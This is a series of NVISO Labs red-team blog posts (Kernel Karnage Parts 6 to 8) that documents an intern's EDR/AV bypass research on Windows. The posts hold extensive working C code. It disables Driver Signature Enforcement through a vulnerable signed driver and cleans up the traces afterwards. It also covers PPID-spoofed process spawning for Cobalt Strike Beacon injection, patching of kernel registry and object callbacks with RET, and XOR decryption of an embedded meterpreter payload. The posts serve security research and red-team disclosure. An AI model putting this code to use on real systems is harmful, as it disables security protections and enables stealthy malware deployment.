🔒
There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Kernel Karnage – Part 8 (Getting Around DSE)

10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the intergration part with CobaltWhispers which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier LUID. Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;

status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid)

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);
SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

HANDLE hKey;
ULONG disposition;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING keyName;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

UNICODE_STRING keyValueName;
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
DWORD keyValue = SERVICE_ERROR_NORMAL;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
keyValue = SERVICE_KERNEL_DRIVER;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
keyValue = SERVICE_DEMAND_START;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
UNICODE_STRING DriverImagePath;
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

NtLoadDriver(&keyName);
//do stuff
NtUnloadDriver(&keyName);

HANDLE hKey;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it is located in ntoskrnl.exe or CI.dll as a global non-exported variable (flag). Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, which is a global boolean variable toggling DSE either enabled or disabled. In any other more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variables in kernel memory and overwrite the value with 0x0 to disable DSE using the vulnerable driver. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. Sounds relatively straightforward you might say, however the hard part is locating g_CiEnabled or g_CiOptions, because even though we know where to go looking, they are not exported so we will need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to adjust for a single vulnerable driver, use lower level API calls, or direct syscalls and be overall more readable.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR variableAddress;
	ULONG flags = 0;

    // locate the address in memory of the DSE variable
	variableAddress = QueryVariable(buildNumber);

    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
        else
            printf("Failed to set new DSE value\n");
    }
	return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
    }
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";
    }

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
        }
    }
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
    }

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;
    }

    FreeLibrary(mappedImageBase);
	return result;
}

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and local mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ Header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and substracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
                    break;
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,
                    offset);

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                        break;
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
                            break;
                        }
                    }
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)
            break;

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
                break;
            }
        }
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space
    // by adding the offset and substracting the base address
    // of the locally mapped copy from the kernel module base address
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}

QueryCiEnabled() uses a hardcoded value of 0x1D8806EB to calculate and resolve the offset.

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks non-WHQL-signed drivers from being loaded, which includes my Interceptor driver. It’s important to note I left HyperGuard (HVCI) turned off, because I currently have no way of defeating Virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code that is responsible for spawning a new spoofed process which is then used to inject the Beacon payload into looks like this:

PROCESS_INFORMATION Spawn(LPSTR procPath, HANDLE parentHandle)
{
    //do dynamic imports
    hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    //enable CIG
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, procPath, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi))
    {
        throw "";
    }

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";

    DeleteProcThreadAttributeList(si.lpAttributeList);
    NtClose(parentHandle);

    return pi;
}

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we’re spoofing), this also happens to include the process token. One of the many things contained in a token are the privileges held by the user or the user’s group that are associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode, instead of pulling a payload from somewhere else. So far this has worked quite well, using stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem, if there are any reader suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling driver signature enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wonderous things this tool can do is disable Driver Signature Enforcement (DSE). It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct though, because there are ways to manually map drivers into memory, however they come with a lot of drawbacks like:

  • Invalid DeviceObject and RegistryPath objects
  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much details here, but manually mapping comes with so much overhead and instability it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291 which will also be integrated in my CobaltWhispers framework for Cobalt Strike, which I just updated to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fullfill its purpose. Writing tools wouldn’t be very useful if they don’t work outside of a lab environment and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show, most challenges to remain undetected and bypass EDR/AV are still presented in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if the time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 6 (Last Call)

9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AVs kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain vision into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deepdive in the inner structure and workings of a kernel driver, how it communicates with other drivers and applications and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to conclude the kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    CR0_WP_OFF_x64();
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        break;
      default:
        return STATUS_NOT_SUPPORTED;
        break;
    }

    *pPointer = (ULONG64)0xC3;
    CR0_WP_ON_x64();
    return STATUS_SUCCESS;
  }
}

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there and most of it covers object callbacks itself and how to use them, not how to bypass or disable them. Nonetheless, I found a couple good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common usecase for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  UNICODE_STRING Name;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8
} OBJECT_TYPE, *POBJECT_TYPE;
OBJECT_TYPE STRUCT

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	PCALLBACK_ENTRY CallbackEntry;
	POBJECT_TYPE ObjectType;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;
} CALLBACK_ENTRY_ITEM, * PCALLBACK_ENTRY_ITEM;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.

2.3 Show me the code!

The above mentioned global variables **PsProcessType and **PsThreatType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);
}

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }
  }
}
Interceptor patch object callback
patched process object callback

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200.000 bytes, it is impractical at best to embed it as a hexadecimal string and it would get immediately flagged when any static analysis is performed. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (DWORD i = 0; i < dataLen; i++) {
		t[i] ^= key[i % keyLen];
	}
}

Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing memory of a different process is not allowed. Instead functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted back to a staged payload embedded as a hexadecimal string.

